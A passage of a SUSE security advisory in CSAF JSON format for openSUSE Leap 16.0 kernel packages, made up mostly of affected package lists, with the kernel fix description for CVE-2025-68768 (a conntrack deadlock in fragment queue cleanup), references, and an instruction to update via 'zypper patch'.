"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68764"
},
{
"cve": "CVE-2025-68768",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68768"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ninet: frags: flush pending skbs in fqdir_pre_exit()\n\nWe have been seeing occasional deadlocks on pernet_ops_rwsem since\nSeptember in NIPA. The stuck task was usually modprobe (often loading\na driver like ipvlan), trying to take the lock as a Writer.\nlockdep does not track readers for rwsems so the read wasn\u0027t obvious\nfrom the reports.\n\nOn closer inspection the Reader holding the lock was conntrack looping\nforever in nf_conntrack_cleanup_net_list(). Based on past experience\nwith occasional NIPA crashes I looked thru the tests which run before\nthe crash and noticed that the crash follows ip_defrag.sh. An immediate\nred flag. Scouring thru (de)fragmentation queues reveals skbs sitting\naround, holding conntrack references.\n\nThe problem is that since conntrack depends on nf_defrag_ipv6,\nnf_defrag_ipv6 will load first. Since nf_defrag_ipv6 loads first its\nnetns exit hooks run _after_ conntrack\u0027s netns exit hook.\n\nFlush all fragment queue SKBs during fqdir_pre_exit() to release\nconntrack references before conntrack cleanup runs. Also flush\nthe queues in timer expiry handlers when they discover fqdir-\u003edead\nis set, in case packet sneaks in while we\u0027re running the pre_exit\nflush.\n\nThe commit under Fixes is not exactly the culprit, but I think\npreviously the timer firing would eventually unblock the spinning\nconntrack.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68768",
"url": "https://www.suse.com/security/cve/CVE-2025-68768"
},
{
"category": "external",
"summary": "SUSE Bug 1256579 for CVE-2025-68768",
"url": "https://bugzilla.suse.com/1256579"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
